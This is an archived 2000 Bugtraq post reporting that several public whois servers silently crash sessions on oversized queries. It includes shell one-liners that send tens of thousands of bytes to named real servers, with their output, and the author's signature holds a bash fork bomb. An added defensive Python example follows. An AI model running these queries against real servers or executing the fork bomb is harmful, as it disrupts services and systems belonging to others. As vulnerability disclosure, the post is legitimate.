The OpenNET Project
Date: Wed, 2 Feb 2000 13:29:07 +0100
From: Michal Zalewski <lcamtuf@DIONE.IDS.PL>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: no comment

In the following example (which works only with the Linux version of the 'whois'
command - the *BSD version has built-in query size limits), replace
joshua.ripe.net with your favourite - whois.arin.net or whois.radb.net...

[lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 10000}'`@joshua.ripe.net
[joshua.ripe.net]

% Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html
% No entries found for the selected source(s).
%
% If you would like to search on arbitrary strings,
% please see the Database page on the RIPE NCC
% web-site at http://www.ripe.net/ripencc/pub-services/db/
% This will only work for RIPE data.
%
% Please note that RIPE whoisd service temporarily
% does not mirror RADB and CW databases. Please query
% these databases directly at:
% whois.radb.net for RADB and
% whois.cw.net for CW.

[lcamtuf@www lcamtuf]$ whois `perl -e '{print "0." x 20000}'`@joshua.ripe.net
[joshua.ripe.net]

% Rights restricted by copyright. See http://www.ripe.net/ripencc/pub-services/db/copyright.html

[lcamtuf@www lcamtuf]$

For whois.arin.net and whois.radb.net, the 'magic point' is at about 248
bytes of query sent. whois.ripe.net seems to panic with buffer larger than
30k, but only with specific sequences (like "0.0.0"...). whois.cw.net can
stand even 80-90kB before crashing sessions.

I have no idea how to explain it - seems just like a regular buffer overrun
in whoisd started from inetd (as it is suggested). But, of course, we
can't get sources of currently running services; it could be addressed as
"silent dropping of excessive data portions with a system-dependent data amount
limit". Only one thing is mysterious - the whoisd service produces verbose
output on any query syntax error or any other problem, except for that.
And the RFC doesn't mention a maximal query length nor _any_ situation when the
connection should be silently dropped.  That's another reason to think
whoisd crashed.

_______________________________________________________
Michal Zalewski * [lcamtuf@ags.pl] <=> [AGS WAN SYSADM]
[dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl]
[+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
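The behaviour the post reports, a long query answered with a silent disconnect instead of the usual diagnostic line, is what a bounded line reader on the server side avoids. The following is an added example, not code from the post or from any whoisd implementation; it uses a constructed in-memory record set and an assumed 1024-byte line limit, since RFC 954 sets none.

```python
# Bounded query reader for a whois-style (RFC 954) line protocol.
# Added example: not code from the original post or from any real whoisd.
import io

MAX_QUERY_BYTES = 1024  # assumed limit (counts the CRLF); RFC 954 sets none
CRLF = b"\r\n"

# Constructed stand-in for a registry database; not real allocation data.
FAKE_DB = {
    b"192.0.2.1": b"inetnum:  192.0.2.0 - 192.0.2.255\nnetname:  EXAMPLE-NET\n",
}

def read_query(stream, max_len=MAX_QUERY_BYTES):
    """Read one CRLF-terminated query line from a binary file-like object.

    Returns (query, None) on success, or (None, diagnostic) when the line
    exceeds max_len or the peer closes early.  The limit is checked as bytes
    arrive, so the buffer never grows beyond max_len + 1 bytes.
    """
    buf = bytearray()
    while True:
        byte = stream.read(1)
        if not byte:
            return None, "% Connection closed before end of query"
        buf += byte
        if buf.endswith(CRLF):
            return bytes(buf[:-2]), None
        if len(buf) > max_len:
            return None, f"% Query too long (limit {max_len} bytes)"

def handle_query(stream, max_len=MAX_QUERY_BYTES):
    """Build the response for one request; every error path is explicit."""
    query, err = read_query(stream, max_len)
    if err is not None:
        return (err + "\n").encode()
    query = query.strip()
    if any(c < 0x20 or c == 0x7F for c in query):
        return b"% Invalid characters in query\n"
    record = FAKE_DB.get(query)
    if record is None:
        return b"% No entries found for the selected source(s).\n"
    return record

def handle_bytes(raw, max_len=MAX_QUERY_BYTES):
    """Run handle_query over an in-memory request (a socket's makefile('rb') works too)."""
    return handle_query(io.BytesIO(raw), max_len)

if __name__ == "__main__":
    print(handle_bytes(b"192.0.2.1\r\n").decode(), end="")
    print(handle_bytes(b"0." * 10000 + CRLF).decode(), end="")
```

Because the oversize case returns a diagnostic line rather than dropping the socket, a client can distinguish "query rejected" from "daemon died", which is exactly the distinction the post could not make.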
